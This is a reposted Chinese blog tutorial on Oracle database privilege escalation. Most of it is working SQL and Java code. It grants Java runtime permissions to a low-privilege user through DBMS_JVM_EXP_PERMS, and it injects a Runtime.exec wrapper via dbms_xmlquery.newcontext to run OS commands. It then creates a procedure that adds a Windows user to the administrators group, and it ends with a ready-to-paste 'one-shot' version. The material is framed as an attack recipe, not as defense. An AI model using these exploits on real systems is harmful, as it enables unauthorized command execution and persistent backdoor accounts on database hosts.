博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Oracle数据库提权(dba权限执行系统命令)
阅读量:4360 次
发布时间:2019-06-07

本文共 3625 字,大约阅读时间需要 12 分钟。

 

0x01 提权准备

这里我们先创建一个低权限的用户test

 

SQL> conn sys/admin123@orcl as sysdba;

 

已连接。

SQL> create user test identified by test;

 

 

 

然后查看一下权限

SQL> select * from session_privs;PRIVILEGECREATE SESSION

 

如上显示,test没有JAVA权限,也只有CREATE SESSION权限

 

我们如果要通过数据库执行系统命令,那么首先要提升数据库用户的权限。

 

 

 

我们首先要获取java权限

DECLARE    POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;    CURSOR C1 IS SELECT 'GRANT', 'ZTZ', 'SYS', 'java.io.FilePermission', '<
>', 'execute', 'ENABLED' FROM DUAL; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; /

 

 

如果想要执行任意代码的话还需要额外获得java.lang.RuntimePermission权限

DECLARE    POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;    CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission','writeFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;    BEGIN    OPEN C1;    FETCH C1 BULK COLLECT INTO POL;    CLOSE C1;    DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);    END;   / DECLARE    POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;    CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission','readFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;    BEGIN    OPEN C1;    FETCH C1 BULK COLLECT INTO POL;    CLOSE C1;    DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);    END;   /

 

 

0x02 JAVA权限执行命令

 

用我们的test帐号登录

 

 

1、首先我们创建java包

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

 

 

 

2、然后我们获取java权限

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<
>'''',''''EXECUTE'''');end;''commit;end;') from dual;

 

 

3、创建我们用来执行命令的函数

select dbms_xmlquery.newcontext('declar e PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

 

4、执行命令

select LinxRUNCMD('whoami') from dual;

 

 

0x03 存储过程执行命令

 

若我们有create procedure权限,而不只是create session这么苦逼时,我们可以创建一个java class然后用创建一个过程来进行调用

 

 

1、首先创建一个java class然后用procedure包装它进行调用

create or replace and resolve java source named JAVACMD as    import java.lang.*;    import java.io.*;    public class JAVACMD    {       public static void execmd(String command) throws IOException       {               Runtime.getRuntime().exec(command);       }   }   /

 

 

 

 

2、创建调用的包

create or replace procedure MYJAVACMD(command in varchar) as language java     name 'JAVACMD.execmd(java.lang.String)';/

 

 

3、执行我们的命令

EXEC MYJAVACMD('net user qingxin qingxin /add');

 

 

会报错是因为代码中没有捕获异常,我们再执行一次即可

 

 

 

 

附上一把梭哈

 

 

CREATE OR REPLACE AND RESOLVE Java SOURCE NAMED "JAVACMD" ASimport java.lang.*;import java.io.*;public class JAVACMD{
public static void execCommand (String command) throws IOException{Runtime.getRuntime().exec(command);}};/CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2)AS LANGUAGE JAVANAME 'JAVACMD.execCommand (java.lang.String)';/exec javacmdproc('cmd.exe /c net user qingxin qingxin /add');exec javacmdproc('cmd.exe /c net localgroup administrators qingxin /add');

 

转载于:https://www.cnblogs.com/-qing-/p/10768290.html

你可能感兴趣的文章
c++ 基础 const char* 转 char*
查看>>
JS-- 小细节--你悟到了什么?
查看>>
收款 借贷
查看>>
Gson关于抽象类的序列化与反序列化
查看>>
Java面向对象之类和对象
查看>>
Oracle数据库提权(dba权限执行系统命令)
查看>>
Hydra爆破神器使用
查看>>
java.util.zip.ZipException: duplicate entry(重复依赖多版本的类库)
查看>>
Run MVC in older version of IIS
查看>>
Ajax 监听
查看>>
隐藏"站长统计"图标
查看>>
Oracle select 中case 的使用以及使用decode替换case
查看>>
创建一个dynamics 365 CRM online plugin (十二) - Asynchronous Plugins
查看>>
Eclipse 常用快捷键 (动画讲解)
查看>>
233 Matrix(矩阵快速幂+思维)
查看>>
Leetcode-Unique Binary Search Trees II
查看>>
Centos7系统下安装Docker
查看>>
PostgreSQL 序列(SEQUENCE)
查看>>
Missing Number
查看>>
Ionic3 demo TallyBook 实例3
查看>>